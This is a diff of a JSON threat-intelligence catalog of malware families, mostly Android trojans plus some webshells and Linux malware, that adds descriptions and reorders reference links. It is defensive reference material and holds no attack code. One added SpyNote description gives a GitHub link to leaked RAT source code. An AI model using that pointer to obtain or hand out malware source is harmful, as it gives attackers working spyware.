"https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/",
- "https://securelist.com/roaming-mantis-dabbles-in-mining-and-phishing-multilingually/85607/"
+ "https://securelist.com/roaming-mantis-part-v/96250/",
+ "https://hitcon.org/2019/CMT/slide-files/d2_s1_r1.pdf"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "f35f219a-6eed-11e8-980a-93bb96299951",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "31d2ce1f-44bf-4738-a41d-ddb43466cd82",
"value": "Roaming Mantis"
},
@@ -2268,8 +2479,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.rootnik",
- "https://blog.fortinet.com/2017/01/26/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-ii-analysis-of-the-scope-of-java",
- "https://blog.fortinet.com/2017/01/24/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-i-debugging-in-the-scope-of-native-layer"
+ "https://blog.fortinet.com/2017/01/24/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-i-debugging-in-the-scope-of-native-layer",
+ "https://blog.fortinet.com/2017/01/26/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-ii-analysis-of-the-scope-of-java"
],
"synonyms": [],
"type": []
@@ -2291,16 +2502,18 @@
"value": "Sauron Locker"
},
{
- "description": "",
+ "description": "SharkBot is a piece of malicious software targeting Android Operating Systems (OSes). It is designed to obtain and misuse financial data by redirecting and stealthily initiating money transfers. SharkBot is particularly active in Europe (United Kingdom, Italy, etc.), but its activity has also been detected in the United States.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.sharkbot",
+ "https://research.checkpoint.com/2022/google-is-on-guard-sharks-shall-not-pass/",
"https://muha2xmad.github.io/malware-analysis/sharkbot/",
+ "https://blog.fox-it.com/2022/09/02/sharkbot-is-back-in-google-play/",
+ "https://www.threatfabric.com/blogs/the-attack-of-the-droppers.html",
"https://www.cleafy.com/cleafy-labs/sharkbot-a-new-generation-of-android-trojan-is-targeting-banks-in-europe",
"https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/",
- "https://blog.fox-it.com/2022/09/02/sharkbot-is-back-in-google-play/",
- "https://blog.fox-it.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/",
- "https://research.checkpoint.com/2022/google-is-on-guard-sharks-shall-not-pass/"
+ "https://bin.re/blog/the-dgas-of-sharkbot/",
+ "https://blog.fox-it.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/"
],
"synonyms": [],
"type": []
@@ -2352,23 +2565,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.slempo",
- "https://www.fireeye.com/blog/threat-research/2015/12/slembunk_an_evolvin.html",
- "https://www.pcworld.com/article/3035725/source-code-for-powerful-android-banking-malware-is-leaked.html"
+ "https://www.pcworld.com/article/3035725/source-code-for-powerful-android-banking-malware-is-leaked.html",
+ "https://www.fireeye.com/blog/threat-research/2015/12/slembunk_an_evolvin.html"
],
"synonyms": [
"SlemBunk"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "f8047de2-fefc-4ee0-825b-f1fae4b20c09",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "d87e2574-7b9c-4ea7-98eb-88f3e139f6ff",
"value": "Slempo"
},
@@ -2377,8 +2581,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.slocker",
- "https://labs.bitdefender.com/2020/05/android-slocker-variant-uses-coronavirus-scare-to-take-android-hostage/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/slocker-mobile-ransomware-starts-mimicking-wannacry/"
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/slocker-mobile-ransomware-starts-mimicking-wannacry/",
+ "https://labs.bitdefender.com/2020/05/android-slocker-variant-uses-coronavirus-scare-to-take-android-hostage/"
],
"synonyms": [],
"type": []
@@ -2391,8 +2595,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.smsagent",
- "https://blog.alyac.co.kr/2128",
- "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/moqhao-related-android-spyware-targeting-japan-and-korea-found-on-google-play/"
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/moqhao-related-android-spyware-targeting-japan-and-korea-found-on-google-play/",
+ "https://blog.alyac.co.kr/2128"
],
"synonyms": [],
"type": []
@@ -2417,10 +2621,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.sova",
- "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html",
"https://muha2xmad.github.io/malware-analysis/sova/",
- "https://www.cleafy.com/cleafy-labs/sova-malware-is-back-and-is-evolving-rapidly",
- "https://blog.cyble.com/2021/09/14/deep-dive-analysis-of-s-o-v-a-android-banking-trojan/"
+ "https://blog.cyble.com/2023/03/09/nexus-the-latest-android-banking-trojan-with-sova-connections",
+ "https://blog.cyble.com/2021/09/14/deep-dive-analysis-of-s-o-v-a-android-banking-trojan/",
+ "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html",
+ "https://liansecurity.com/#/main/news/RWt_ZocBrFZDfCElFqw_/detail",
+ "https://www.cleafy.com/cleafy-labs/sova-malware-is-back-and-is-evolving-rapidly"
],
"synonyms": [],
"type": []
@@ -2433,8 +2639,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.spybanker",
- "https://news.drweb.com/show/?i=11104&lng=en",
- "http://www.welivesecurity.com/2017/02/23/released-android-malware-source-code-used-run-banking-botnet/"
+ "http://www.welivesecurity.com/2017/02/23/released-android-malware-source-code-used-run-banking-botnet/",
+ "https://news.drweb.com/show/?i=11104&lng=en"
],
"synonyms": [],
"type": []
@@ -2460,9 +2666,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.spymax",
- "https://www.zscaler.com/blogs/research/android-spyware-targeting-tanzania-premier-league",
+ "https://twitter.com/malwrhunterteam/status/1250412485808717826",
+ "https://www.threatfabric.com/blogs/spynote-rat-targeting-financial-institutions.html",
"https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset",
- "https://twitter.com/malwrhunterteam/status/1250412485808717826"
+ "https://www.zscaler.com/blogs/research/android-spyware-targeting-tanzania-premier-league"
],
"synonyms": [],
"type": []
@@ -2471,21 +2678,26 @@
"value": "SpyMax"
},
{
- "description": "",
+ "description": "The malware has been released on github at https://github.com/EVLF/Cypher-Rat-Source-Code",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.spynote",
- "https://www.civilsphereproject.org/blog/2021/9/21/capturing-and-detecting-androidtester-remote-access-trojan-with-the-emergency-vpn",
+ "https://mp.weixin.qq.com/s/J_A12SOX0k5TOYFAegBv_w",
"https://ti.qianxin.com/blog/articles/Blade-hawk-The-activities-of-targeted-the-Middle-East-and-West-Asia-are-exposed/",
- "https://labs.k7computing.com/index.php/spynote-an-android-snooper/",
- "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/",
- "https://bulldogjob.pl/articles/1200-an-in-depth-analysis-of-spynote-remote-access-trojan",
- "https://www.volexity.com/blog/2020/03/31/storm-cloud-unleashed-tibetan-community-focus-of-highly-targeted-fake-flash-campaign/",
"https://mp.weixin.qq.com/s/mstwBMkS0G3Et4GOji2mwA",
+ "https://www.volexity.com/blog/2020/03/31/storm-cloud-unleashed-tibetan-community-focus-of-highly-targeted-fake-flash-campaign/",
+ "https://www.threatfabric.com/blogs/spynote-rat-targeting-financial-institutions.html",
+ "https://www.bleepingcomputer.com/news/security/spynote-android-malware-infections-surge-after-source-code-leak/",
+ "https://labs.k7computing.com/index.php/spynote-an-android-snooper/",
+ "https://bulldogjob.pl/articles/1200-an-in-depth-analysis-of-spynote-remote-access-trojan",
+ "https://www.civilsphereproject.org/blog/2021/9/21/capturing-and-detecting-androidtester-remote-access-trojan-with-the-emergency-vpn",
+ "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr",
"https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/",
- "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr"
+ "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/"
+ ],
+ "synonyms": [
+ "CypherRat"
],
- "synonyms": [],
"type": []
},
"uuid": "31592c69-d540-4617-8253-71ae0c45526c",
@@ -2529,15 +2741,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "a33df440-f112-4a5e-a290-3c65dae6091d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "d99c0a47-9d61-4d92-86ec-86a87b060d76",
"value": "Svpeng"
},
@@ -2623,7 +2826,7 @@
"value": "ThiefBot"
},
{
- "description": "",
+ "description": "According to Trend Micro, this malware appears to have been designed to steal credentials associated with membership websites of major Japanese telecommunication services.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.tianyspy",
@@ -2656,8 +2859,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.titan",
- "https://www.alienvault.com/blogs/labs-research/delivery-keyboy",
- "https://blog.lookout.com/titan-mobile-threat"
+ "https://blog.lookout.com/titan-mobile-threat",
+ "https://www.alienvault.com/blogs/labs-research/delivery-keyboy"
],
"synonyms": [],
"type": []
@@ -2670,16 +2873,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.triada",
- "https://securelist.com/triada-trojan-in-whatsapp-mod/103679/",
"https://arstechnica.com/information-technology/2019/06/google-confirms-2017-supply-chain-attack-that-sneaked-backdoor-on-android-devices/",
"https://securelist.com/apkpure-android-app-store-infected/101845/",
- "https://securelist.com/mobile-malware-evolution-2019/96280/",
+ "https://securelist.com/everyone-sees-not-what-they-want-to-see/74997/",
+ "https://securelist.com/triada-trojan-in-whatsapp-mod/103679/",
+ "https://security.googleblog.com/2019/06/pha-family-highlights-triada.html",
"https://blog.checkpoint.com/2016/06/17/in-the-wild-mobile-malware-implements-new-features/",
+ "https://securelist.com/mobile-malware-evolution-2019/96280/",
"https://www.nowsecure.com/blog/2016/11/21/android-malware-analysis-radare-triada-trojan/",
"http://contagiominidump.blogspot.de/2016/07/android-triada-modular-trojan.html",
- "https://securelist.com/attack-on-zygote-a-new-twist-in-the-evolution-of-mobile-threats/74032/",
- "https://security.googleblog.com/2019/06/pha-family-highlights-triada.html",
- "https://securelist.com/everyone-sees-not-what-they-want-to-see/74997/"
+ "https://securelist.com/attack-on-zygote-a-new-twist-in-the-evolution-of-mobile-threats/74032/"
],
"synonyms": [],
"type": []
@@ -2755,12 +2958,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_005",
- "https://blog.talosintelligence.com/2020/10/donot-firestarter.html",
- "https://community.riskiq.com/article/6f60db72",
- "https://s.tencent.com/research/report/951.html",
- "https://cybleinc.com/2021/04/21/donot-team-apt-group-is-back-to-using-old-malicious-patterns/",
"https://blogs.360.cn/post/APT-C-35_target_at_armed_forces_in_Pakistan.html",
- "https://twitter.com/voodoodahl1/status/1267571622732578816"
+ "https://s.tencent.com/research/report/951.html",
+ "https://community.riskiq.com/article/6f60db72",
+ "https://twitter.com/voodoodahl1/status/1267571622732578816",
+ "https://blog.talosintelligence.com/2020/10/donot-firestarter.html",
+ "https://cybleinc.com/2021/04/21/donot-team-apt-group-is-back-to-using-old-malicious-patterns/"
],
"synonyms": [],
"type": []
@@ -2773,10 +2976,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_006",
- "https://medium.com/@ThreatMiner/android-trojan-targeting-korean-demographic-using-github-for-c2-8219fc39f749",
- "https://twitter.com/MsftSecIntel/status/1441524497924833282?s=20",
"https://twitter.com/ReBensk/status/1438027183490940931",
- "https://blog.cyble.com/2021/09/17/sophisticated-spyware-posing-as-a-banking-application-to-target-korean-users/"
+ "https://twitter.com/MsftSecIntel/status/1441524497924833282?s=20",
+ "https://blog.cyble.com/2021/09/17/sophisticated-spyware-posing-as-a-banking-application-to-target-korean-users/",
+ "https://medium.com/@ThreatMiner/android-trojan-targeting-korean-demographic-using-github-for-c2-8219fc39f749"
],
"synonyms": [],
"type": []
@@ -2815,9 +3018,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.vajraspy",
- "https://twitter.com/LukasStefanko/status/1509451238366236674",
"https://twitter.com/malwrhunterteam/status/1481312752782258176",
- "https://mp.weixin.qq.com/s/B0ElRhbqLzs-wGQh79fTww"
+ "https://mp.weixin.qq.com/s/B0ElRhbqLzs-wGQh79fTww",
+ "https://twitter.com/LukasStefanko/status/1509451238366236674"
],
"synonyms": [],
"type": []
@@ -2840,14 +3043,27 @@
"uuid": "1ad5b462-1b0d-4c2f-901d-ead6c9f227bc",
"value": "vamp"
},
+ {
+ "description": "According to Mandiant, VINETHORN is an Android malware family capable of a wide range of backdoor functionality. It can steal system information, read SMS inboxes, send SMS messages, access contact lists and call histories, record audio and video, and track device location via GPS.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.vinethorn",
+ "https://www.mandiant.com/media/17826"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "6da6dfb6-2c50-465c-9394-26695d72e8c7",
+ "value": "VINETHORN"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.viper_rat",
- "https://securelist.com/blog/incidents/77562/breaking-the-weakest-link-of-the-strongest-chain/",
"https://blog.lookout.com/blog/2017/02/16/viperrat-mobile-apt/",
- "https://about.fb.com/wp-content/uploads/2021/04/Technical-threat-report-Arid-Viper-April-2021.pdf"
+ "https://about.fb.com/wp-content/uploads/2021/04/Technical-threat-report-Arid-Viper-April-2021.pdf",
+ "https://securelist.com/blog/incidents/77562/breaking-the-weakest-link-of-the-strongest-chain/"
],
"synonyms": [],
"type": []
@@ -2860,6 +3076,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.vultur",
+ "https://www.cleafy.com/cleafy-labs/the-android-malwares-journey-from-google-play-to-banking-fraud",
+ "https://www.threatfabric.com/blogs/the-attack-of-the-droppers.html",
"https://www.threatfabric.com/blogs/vultur-v-for-vnc.html",
"https://twitter.com/_icebre4ker_/status/1485651238175846400"
],
@@ -2877,9 +3095,9 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.wirex",
"https://krebsonsecurity.com/2017/08/tech-firms-team-up-to-take-down-wirex-android-ddos-botnet/",
- "https://therecord.media/turkish-national-charged-for-ddos-attacks-with-the-wirex-botnet/",
"https://www.flashpoint-intel.com/blog/wirex-botnet-industry-collaboration/",
- "https://www.justice.gov/usao-ndil/pr/federal-indictment-chicago-charges-turkish-national-directing-cyber-attack"
+ "https://www.justice.gov/usao-ndil/pr/federal-indictment-chicago-charges-turkish-national-directing-cyber-attack",
+ "https://therecord.media/turkish-national-charged-for-ddos-attacks-with-the-wirex-botnet/"
],
"synonyms": [],
"type": []
@@ -2906,8 +3124,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.wroba",
- "https://securelist.com/roaming-mantis-reaches-europe/105596/",
- "https://www.avira.com/en/blog/the-android-banking-trojan-wroba-shifts-attack-from-south-korea-to-target-users-in-japan"
+ "https://www.avira.com/en/blog/the-android-banking-trojan-wroba-shifts-attack-from-south-korea-to-target-users-in-japan",
+ "https://securelist.com/roaming-mantis-reaches-europe/105596/"
],
"synonyms": [],
"type": []
@@ -2920,8 +3138,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.xbot",
- "https://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/",
- "https://blog.avast.com/2015/02/17/angry-android-hacker-hides-xbot-malware-in-popular-application-icons/"
+ "https://blog.avast.com/2015/02/17/angry-android-hacker-hides-xbot-malware-in-popular-application-icons/",
+ "https://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/"
],
"synonyms": [],
"type": []
@@ -2930,12 +3148,16 @@
"value": "Xbot"
},
{
- "description": "",
+ "description": "Xenomorph is a Android Banking RAT developed by the Hadoken.Security actor.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.xenomorph",
"https://www.threatfabric.com/blogs/xenomorph-a-newly-hatched-banking-trojan.html",
- "https://cryptax.medium.com/unpacking-a-jsonpacker-packed-sample-4038e12119f5"
+ "https://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html",
+ "https://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html",
+ "https://www.threatfabric.com/blogs/bugdrop-new-dropper-bypassing-google-security-measures.html",
+ "https://cryptax.medium.com/unpacking-a-jsonpacker-packed-sample-4038e12119f5",
+ "https://www.zscaler.com/blogs/security-research/rise-banking-trojan-dropper-google-play-0"
],
"synonyms": [],
"type": []
@@ -2974,21 +3196,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.xrat",
- "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf",
- "https://blog.lookout.com/xrat-mobile-threat"
+ "https://blog.lookout.com/xrat-mobile-threat",
+ "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "c76e2ee8-52d1-4a55-81df-5542d232ca32",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "a8f167a8-30b9-4953-8eb6-247f0d046d32",
"value": "XRat"
},
@@ -3005,6 +3218,19 @@
"uuid": "a2dad59d-2355-415c-b4d6-62236d3de4c7",
"value": "YellYouth"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.zanubis",
+ "https://labs.k7computing.com/index.php/an-upsurge-of-new-android-banking-trojan-zanubis/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "cebf13e5-dbfc-49d6-8715-e3b7687d386f",
+ "value": "Zanubis"
+ },
{
"description": "",
"meta": {
@@ -3023,11 +3249,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.zoopark",
+ "https://securelist.com/whos-who-in-the-zoo/85394/",
"https://securelist.com/whos-who-in-the-zoo/85394",
"https://www.secureworks.com/research/threat-profiles/cobalt-juno",
- "https://securelist.com/whos-who-in-the-zoo/85394/",
- "https://securelist.com/apt-trends-report-q2-2019/91897/",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/03114450/ZooPark_for_public_final_edit.pdf"
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/03114450/ZooPark_for_public_final_edit.pdf",
+ "https://securelist.com/apt-trends-report-q2-2019/91897/"
],
"synonyms": [],
"type": []
@@ -3041,8 +3267,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.ztorg",
"https://blog.fortinet.com/2017/03/15/teardown-of-a-recent-variant-of-android-ztorg-part-1",
- "http://blog.fortinet.com/2017/03/08/teardown-of-android-ztorg-part-2",
- "https://securelist.com/ztorg-from-rooting-to-sms/78775/"
+ "https://securelist.com/ztorg-from-rooting-to-sms/78775/",
+ "http://blog.fortinet.com/2017/03/08/teardown-of-android-ztorg-part-2"
],
"synonyms": [
"Qysly"
@@ -3052,25 +3278,52 @@
"uuid": "9fbf97c0-d87a-47b0-a511-0147a58b5202",
"value": "Ztorg"
},
+ {
+ "description": "WebShell.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/asp.nightrunner",
+ "https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "b0206aac-30ff-41ce-b7d4-1b94ab15e3b1",
+ "value": "Nightrunner"
+ },
+ {
+ "description": "WebShell.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/asp.tunna",
+ "https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "b057f462-dc32-4f7b-95e0-98a20a48f2b2",
+ "value": "Tunna"
+ },
{
"description": "According to Unit42, TwoFace is a two-staged (loader+payload) webshell, written in C# and meant to run on webservers with ASP.NET. The author of the initial loader webshell included legitimate and expected content that will be displayed if a visitor accesses the shell in a browser, likely to remain undetected. The code in the loader webshell includes obfuscated variable names and the embedded payload is encoded and encrypted. To interact with the loader webshell, the threat actor uses HTTP POST requests to the compromised server.\r\n\r\nThe secondary webshell, which we call the payload, is embedded within the loader in encrypted form and contains additional functionality that we will discuss in further detail. When the threat actor wants to interact with the remote server, they provide data that the loader will use to modify a decryption key embedded within the loader that will be in turn used to decrypt the embedded TwoFace payload. Commands supported by the payload are execution of programs, up-, download and deletion of files and capability to manipulate MAC timestamps.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/asp.twoface",
- "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1536345486.pdf",
- "https://unit42.paloaltonetworks.com/unit42-oilrig-performs-tests-twoface-webshell/",
- "https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf",
- "https://www.recordedfuture.com/full-spectrum-detections-five-popular-web-shells/",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/",
"https://unit42.paloaltonetworks.com/atoms/evasive-serpens/",
- "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/",
"https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf",
"https://www.youtube.com/watch?time_continue=1333&v=1CGAmjAV8nI",
+ "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1536345486.pdf",
+ "https://unit42.paloaltonetworks.com/unit42-oilrig-performs-tests-twoface-webshell/",
"https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/",
+ "https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy",
"https://drive.google.com/file/d/1oA4YSwXLxEF-EXJcrM76Bc4_7ZfBGYE4/view",
- "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae",
+ "https://unit42.paloaltonetworks.com/unit42-twoface-webshell-persistent-access-point-lateral-movement/",
+ "https://www.recordedfuture.com/full-spectrum-detections-five-popular-web-shells/",
"https://www.youtube.com/watch?v=GjquFKa4afU",
- "https://unit42.paloaltonetworks.com/unit42-twoface-webshell-persistent-access-point-lateral-movement/"
+ "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2020-0312.pdf"
],
"synonyms": [
"HighShell",
@@ -3080,15 +3333,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "9334c430-0d83-4893-8982-66a1dc1a2b11",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "a98a04e5-1f86-44b8-91ff-dbe1534782ba",
"value": "TwoFace"
},
@@ -3105,14 +3349,14 @@
"value": "Unidentified ASP 001 (Webshell)"
},
{
- "description": "",
+ "description": "Abcbot is a modular Go-based botnet and malware that propagates via exploits and brute force attempts. The botnet was observed launching DDoS attacks, perform internet scans, and serve web pages. It is probably linked to Xanthe-based clipjacking campaign.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.abcbot",
+ "https://www.cadosecurity.com/abcbot-an-evolution-of-xanthe/",
"https://www.cadosecurity.com/the-continued-evolution-of-abcbot/",
- "https://blog.netlab.360.com/abcbot_an_evolving_botnet_en/",
"https://www.lacework.com/blog/abc-botnet-attacks-on-the-rise/",
- "https://www.cadosecurity.com/abcbot-an-evolution-of-xanthe/"
+ "https://blog.netlab.360.com/abcbot_an_evolving_botnet_en/"
],
"synonyms": [],
"type": []
@@ -3125,8 +3369,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.acbackdoor",
- "https://www.bleepingcomputer.com/news/security/linux-windows-users-targeted-with-new-acbackdoor-malware/",
- "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf"
+ "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
+ "https://medium.com/@Ilandu/portdoor-malware-afc9d0796cba",
+ "https://www.bleepingcomputer.com/news/security/linux-windows-users-targeted-with-new-acbackdoor-malware/"
],
"synonyms": [],
"type": []
@@ -3139,17 +3384,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.acidrain",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
- "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works",
- "https://www.splunk.com/en_us/blog/security/threat-update-acidrain-wiper.html",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
- "https://www.splunk.com/en_us/blog/security/strt-ta03-cpe-destructive-software.html",
- "https://www.reversemode.com/2022/03/viasat-incident-from-speculation-to.html",
- "https://www.bleepingcomputer.com/news/security/viasat-confirms-satellite-modems-were-wiped-with-acidrain-malware/",
"https://www.sentinelone.com/labs/acidrain-a-modem-wiper-rains-down-on-europe/",
- "https://cybersecuritynews.com/acidrain-wiper-malware/",
+ "https://www.reversemode.com/2022/03/viasat-incident-from-speculation-to.html",
"https://www.techtimes.com/articles/273755/20220331/viasat-hit-russia-s-wiper-malware-called-acidrain-affecting-european.htm",
- "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat"
+ "https://cybersecuritynews.com/acidrain-wiper-malware/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
+ "https://www.youtube.com/watch?v=mrTdSdMMgnk",
+ "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works",
+ "https://www.splunk.com/en_us/blog/security/strt-ta03-cpe-destructive-software.html",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
+ "https://www.splunk.com/en_us/blog/security/threat-update-acidrain-wiper.html",
+ "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
+ "https://www.bleepingcomputer.com/news/security/viasat-confirms-satellite-modems-were-wiped-with-acidrain-malware/"
],
"synonyms": [],
"type": []
@@ -3162,8 +3408,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.age_locker",
- "https://therecord.media/qnap-warns-of-agelocker-ransomware-attacks-against-nas-devices/",
"https://twitter.com/IntezerLabs/status/1326880812344676352",
+ "https://therecord.media/qnap-warns-of-agelocker-ransomware-attacks-against-nas-devices/",
"https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/"
],
"synonyms": [],
@@ -3201,21 +3447,21 @@
"value": "Aisuru"
},
{
- "description": "",
+ "description": "Backdoor deployed by the TrickBot actors. It uses DNS as the command and control channel as well as for exfiltration of data.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.anchor_dns",
- "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
"https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://medium.com/stage-2-security/anchor-dns-malware-family-goes-cross-platform-d807ba13ca30",
+ "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
+ "https://www.netscout.com/blog/asert/dropping-anchor",
"https://cyware.com/news/trickbots-anchordns-is-now-upgraded-to-anchormail-a21f5490/",
"https://securityintelligence.com/posts/new-malware-trickbot-anchordns-backdoor-upgrades-anchormail/",
